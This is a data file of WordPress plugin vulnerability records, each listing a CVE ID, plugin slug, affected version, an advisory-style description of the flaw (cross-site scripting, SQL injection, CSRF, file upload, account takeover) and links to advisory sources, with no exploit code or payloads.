{"CVE_ID":"CVE-2024-10187","slug":"mycred","versionImpact":"2.7.4","description":"The myCred \u2013 Loyalty Points and Rewards plugin for WordPress and WooCommerce \u2013 Give Points, Ranks, Badges, Cashback, WooCommerce rewards, and WooCommerce credits for Gamification plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's mycred_link shortcode in all versions up to, and including, 2.7.4 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/23a081d4-443d-4b3b-8c89-9eb0e23c961e?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/23a081d4-443d-4b3b-8c89-9eb0e23c961e?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/mycred\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/mycred\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3183178\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3183178\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11914","slug":"attire-blocks","versionImpact":"1.9.5","description":"The Gutenberg Blocks and Page Layouts \u2013 Attire Blocks plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'attire-blocks\/post-carousel' block in all versions up to, and including, 1.9.5 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/attire-blocks\\\/trunk\\\/blocks\\\/dynamic\\\/post-carousel\\\/index.php#L445\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/attire-blocks\\\/trunk\\\/blocks\\\/dynamic\\\/post-carousel\\\/index.php#L445\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/attire-blocks\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/attire-blocks\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5c7973be-cf39-4452-9e41-19d2e6aa5e97?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5c7973be-cf39-4452-9e41-19d2e6aa5e97?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12404","slug":"internal-link-shortcode","versionImpact":"1.1.0","description":"The CF Internal Link Shortcode plugin for WordPress is vulnerable to SQL Injection via the 'post_title' parameter in all versions up to, and including, 1.1.0 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/internal-link-shortcode\\\/trunk\\\/internal-link-shortcode.php#L82\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/internal-link-shortcode\\\/trunk\\\/internal-link-shortcode.php#L82\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1661bb28-e5b4-4319-84bb-6cbeac266147?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1661bb28-e5b4-4319-84bb-6cbeac266147?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13852","slug":"option-editor","description":"The Option Editor plugin for WordPress is vulnerable to Cross-Site Request Forgery in version 1.0. This is due to missing nonce validation on the plugin_page() function. This makes it possible for unauthenticated attackers to update arbitrary options on the WordPress site via a forged request, granted they can trick a site administrator into performing an action such as clicking on a link. This can be leveraged to update the default role for registration to administrator and enable user registration for attackers to gain administrative user access to a vulnerable site.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/option-editor\\\/trunk\\\/option-editor.php#L70\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/option-editor\\\/trunk\\\/option-editor.php#L70\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/option-editor\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/option-editor\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/50adbe1d-9d79-4015-9e09-2166f97efc47?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/50adbe1d-9d79-4015-9e09-2166f97efc47?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-2511","slug":"ahathat","versionImpact":"1.6","description":"The AHAthat Plugin plugin for WordPress is vulnerable to time-based SQL Injection via the 'id' parameter in all versions up to, and including, 1.6 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for authenticated attackers, with Administrator-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","refs":"[{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/ahathat\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/ahathat\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/cde440a2-55f8-406a-b81b-919028f0e887?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/cde440a2-55f8-406a-b81b-919028f0e887?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-32202","slug":"insert-or-embed-articulate-content-into-wordpress","versionImpact":"4.3000000025","description":"Unrestricted Upload of File with Dangerous Type vulnerability in Brian Batt - elearningfreak.com Insert or Embed Articulate Content into WordPress allows Upload a Web Shell to a Web Server. This issue affects Insert or Embed Articulate Content into WordPress: from n\/a through 4.3000000025.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/insert-or-embed-articulate-content-into-wordpress\\\/vulnerability\\\/wordpress-insert-or-embed-articulate-content-into-wordpress-plugin-4-3000000025-arbitrary-file-upload-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/insert-or-embed-articulate-content-into-wordpress\\\/vulnerability\\\/wordpress-insert-or-embed-articulate-content-into-wordpress-plugin-4-3000000025-arbitrary-file-upload-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-3605","slug":"frontend-login-and-registration-blocks","versionImpact":"1.0.7","description":"The Frontend Login and Registration Blocks plugin for WordPress is vulnerable to privilege escalation via account takeover in all versions up to, and including, 1.0.7. This is due to the plugin not properly validating a user's identity prior to updating their details like email via the flr_blocks_user_settings_handle_ajax_callback() function. This makes it possible for unauthenticated attackers to change arbitrary user's email addresses, including administrators, and leverage that to reset the user's password and gain access to their account.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/frontend-login-and-registration-blocks\\\/trunk\\\/inc\\\/class-flr-blocks-user-settings.php#L59\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/frontend-login-and-registration-blocks\\\/trunk\\\/inc\\\/class-flr-blocks-user-settings.php#L59\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0c11668c-6dc3-4539-b2be-bf6528bed73e?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0c11668c-6dc3-4539-b2be-bf6528bed73e?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-5258","slug":"conference-scheduler","versionImpact":"2.5.1","description":"The Conference Scheduler plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018className\u2019 parameter in all versions up to, and including, 2.5.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/conference-scheduler\\\/trunk\\\/conf-scheduler.php#L1703\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/conference-scheduler\\\/trunk\\\/conf-scheduler.php#L1703\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3316436\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3316436\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/conference-scheduler\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/conference-scheduler\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0d0a03e5-b09c-430d-aa65-8ef9e01cf241?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0d0a03e5-b09c-430d-aa65-8ef9e01cf241?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-6082","slug":"birth-chart-compatibility","versionImpact":"2.0","description":"The Birth Chart Compatibility plugin for WordPress is vulnerable to Full Path Disclosure in all versions up to, and including, 2.0. This is due to insufficient protection against directly accessing the plugin's index.php file, which causes an error exposing the full path. This makes it possible for unauthenticated attackers to retrieve the full path of the web application, which can be used to aid other attacks. The information displayed is not useful on its own, and requires another vulnerability to be present for damage to an affected website.","refs":"[{\"url\":\"https:\\\/\\\/plugins.svn.wordpress.org\\\/birth-chart-compatibility\\\/trunk\\\/index.php\",\"name\":\"https:\\\/\\\/plugins.svn.wordpress.org\\\/birth-chart-compatibility\\\/trunk\\\/index.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/birth-chart-compatibility\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/birth-chart-compatibility\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4607dca0-d3b7-4fca-8f89-a0a739bd7551?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4607dca0-d3b7-4fca-8f89-a0a739bd7551?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-1470","slug":"ecommerce-product-catalog","versionImpact":"3.3.8","description":"The eCommerce Product Catalog plugin for WordPress is vulnerable to Stored Cross-Site Scripting via some of its settings parameters in versions up to, and including, 3.3.8 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2881773\\\/ecommerce-product-catalog\\\/trunk\\\/modules\\\/price\\\/price-settings.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2881773\\\/ecommerce-product-catalog\\\/trunk\\\/modules\\\/price\\\/price-settings.php\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/26b7438e-438b-41eb-9458-2fba8ab1964d?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/26b7438e-438b-41eb-9458-2fba8ab1964d?source=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0892","slug":"bizlibrary","versionImpact":"1.1","description":"The BizLibrary WordPress plugin through 1.1 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/54150be5-a53f-4b94-8ce5-04e073e3ab1f\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/54150be5-a53f-4b94-8ce5-04e073e3ab1f\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-2289","slug":"wp-vertical-image-slider","versionImpact":"1.2.16","description":"The wordpress vertical image slider plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the \u2018search_term\u2019 parameter in versions up to, and including, 1.2.16 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c9983364-9b52-4acc-91d4-b352c6d24d52?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c9983364-9b52-4acc-91d4-b352c6d24d52?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2824902%40wp-vertical-image-slider%2Ftags%2F1.2.16&new=2902084%40wp-vertical-image-slider%2Ftags%2F1.2.17\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2824902%40wp-vertical-image-slider%2Ftags%2F1.2.16&new=2902084%40wp-vertical-image-slider%2Ftags%2F1.2.17\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2021-4227","slug":"ark-wysiwyg-comment-editor","versionImpact":"2.15.6","description":"The ark-commenteditor WordPress plugin through 2.15.6 does not properly sanitise or encode the comments when in Source editor, allowing attackers to inject an iFrame in the page and thus load arbitrary content from any page to the comment section","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/8d015eba-31dc-44cb-a051-4e95df782b75\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/8d015eba-31dc-44cb-a051-4e95df782b75\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1652","slug":"categorify","versionImpact":"1.0.7.4","description":"The Categorify plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the categorifyAjaxClearCategory function in all versions up to, and including, 1.0.7.4. This makes it possible for authenticated attackers, with subscriber-level access and above, to clear categories.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/acccc6ae-553d-4ed5-8ba9-06a9061d725c?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/acccc6ae-553d-4ed5-8ba9-06a9061d725c?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3034410\\\/categorify\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3034410\\\/categorify\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1422","slug":"addon-elements-for-elementor-page-builder","versionImpact":"1.12.12","description":"The Elementor Addon Elements plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the modal popup widget's effect setting in all versions up to, and including, 1.12.12 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4ba28184-b5c3-4a5c-a376-29b3c6a2aa20?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4ba28184-b5c3-4a5c-a376-29b3c6a2aa20?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/addon-elements-for-elementor-page-builder\\\/trunk\\\/modules\\\/modal-popup\\\/widgets\\\/modal-popup.php#L1048\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/addon-elements-for-elementor-page-builder\\\/trunk\\\/modules\\\/modal-popup\\\/widgets\\\/modal-popup.php#L1048\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/addon-elements-for-elementor-page-builder\\\/trunk\\\/modules\\\/modal-popup\\\/widgets\\\/modal-popup.php#L1062\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/addon-elements-for-elementor-page-builder\\\/trunk\\\/modules\\\/modal-popup\\\/widgets\\\/modal-popup.php#L1062\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3037925%40addon-elements-for-elementor-page-builder%2Ftrunk&old=3031349%40addon-elements-for-elementor-page-builder%2Ftrunk&sfp_email=&sfph_mail=#file26\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3037925%40addon-elements-for-elementor-page-builder%2Ftrunk&old=3031349%40addon-elements-for-elementor-page-builder%2Ftrunk&sfp_email=&sfph_mail=#file26\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8363","slug":"share-this-image","versionImpact":"2.02","description":"The Share This Image plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's STI Buttons shortcode in all versions up to, and including, 2.02 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d01b6056-a38d-4a60-9cdc-68663aa2aed6?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d01b6056-a38d-4a60-9cdc-68663aa2aed6?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/share-this-image\\\/tags\\\/2.02\\\/includes\\\/class-sti-shortcodes.php#L40\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/share-this-image\\\/tags\\\/2.02\\\/includes\\\/class-sti-shortcodes.php#L40\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/share-this-image\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/share-this-image\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3146524\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3146524\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9018","slug":"wp-easy-gallery","versionImpact":"4.8.5","description":"The WP Easy Gallery \u2013 WordPress Gallery Plugin plugin for WordPress is vulnerable to time-based SQL Injection via the \u2018key\u2019 parameter in all versions up to, and including, 4.8.5 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for authenticated attackers, with Contributor-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a1c4c632-66f2-4987-b7da-048dbe4a3044?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a1c4c632-66f2-4987-b7da-048dbe4a3044?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wp-easy-gallery\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wp-easy-gallery\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-easy-gallery\\\/trunk\\\/wp-easy-gallery.php#L866\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-easy-gallery\\\/trunk\\\/wp-easy-gallery.php#L866\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8920","slug":"fonto","versionImpact":"1.2.1","description":"The Fonto \u2013 Custom Web Fonts Manager plugin for WordPress is vulnerable to Stored Cross-Site Scripting via SVG File uploads in all versions up to, and including, 1.2.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses the SVG file.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/358be91d-cb00-429b-a4ed-69bf81e4d19e?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/358be91d-cb00-429b-a4ed-69bf81e4d19e?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/fonto\\\/trunk\\\/includes\\\/class-fonto.php#L373\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/fonto\\\/trunk\\\/includes\\\/class-fonto.php#L373\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/fonto\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/fonto\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3169936\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3169936\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3169936\\\/#file2\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3169936\\\/#file2\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10269","slug":"easy-svg","versionImpact":"3.7","description":"The Easy SVG Support plugin for WordPress is vulnerable to Stored Cross-Site Scripting via REST API SVG File uploads in all versions up to, and including, 3.7 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses the SVG file.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5fbc0866-1e9d-457a-8ef3-fb046c89c1dd?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5fbc0866-1e9d-457a-8ef3-fb046c89c1dd?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/easy-svg\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/easy-svg\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3181757\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3181757\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10869","slug":"guardgiant","versionImpact":"2.2.6","description":"The WordPress Brute Force Protection \u2013 Stop Brute Force Attacks plugin for WordPress is vulnerable to Reflected Cross-Site Scripting due to the use of add_query_arg & remove_query_arg without appropriate escaping on the URL in all versions up to, and including, 2.2.6. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/guardgiant\\\/tags\\\/2.2.6\\\/includes\\\/class-guardgiant-table-login-activity-log.php#L483\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/guardgiant\\\/tags\\\/2.2.6\\\/includes\\\/class-guardgiant-table-login-activity-log.php#L483\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/guardgiant\\\/tags\\\/2.2.6\\\/includes\\\/class-guardgiant-table-login-activity-log.php#L491\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/guardgiant\\\/tags\\\/2.2.6\\\/includes\\\/class-guardgiant-table-login-activity-log.php#L491\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0cca8b75-c4f5-47ef-90a1-c1270e2f37c1?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0cca8b75-c4f5-47ef-90a1-c1270e2f37c1?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13652","slug":"ecpay-ecommerce-for-woocommerce","versionImpact":"1.1.2411060","description":"The ECPay Ecommerce for WooCommerce plugin for WordPress is vulnerable to unauthorized loss of data due to a missing capability check on the 'clear_ecpay_debug_log' AJAX action in all versions up to, and including, 1.1.2411060. This makes it possible for authenticated attackers, with Subscriber-level access and above, to clear the plugin's log files.","refs":"[{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/ecpay-ecommerce-for-woocommerce\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/ecpay-ecommerce-for-woocommerce\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5ae08e0b-ea17-46c1-aad3-4ecea69c1bdc?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5ae08e0b-ea17-46c1-aad3-4ecea69c1bdc?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13848","slug":"reaction-buttons","versionImpact":"2.1.6","description":"The Reaction Buttons plugin for WordPress is vulnerable to Stored Cross-Site Scripting via admin settings in all versions up to, and including, 2.1.6 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled.","refs":"[{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/reaction-buttons\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/reaction-buttons\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9f5a77d1-b575-4e7c-bf27-fc78260de302?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9f5a77d1-b575-4e7c-bf27-fc78260de302?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
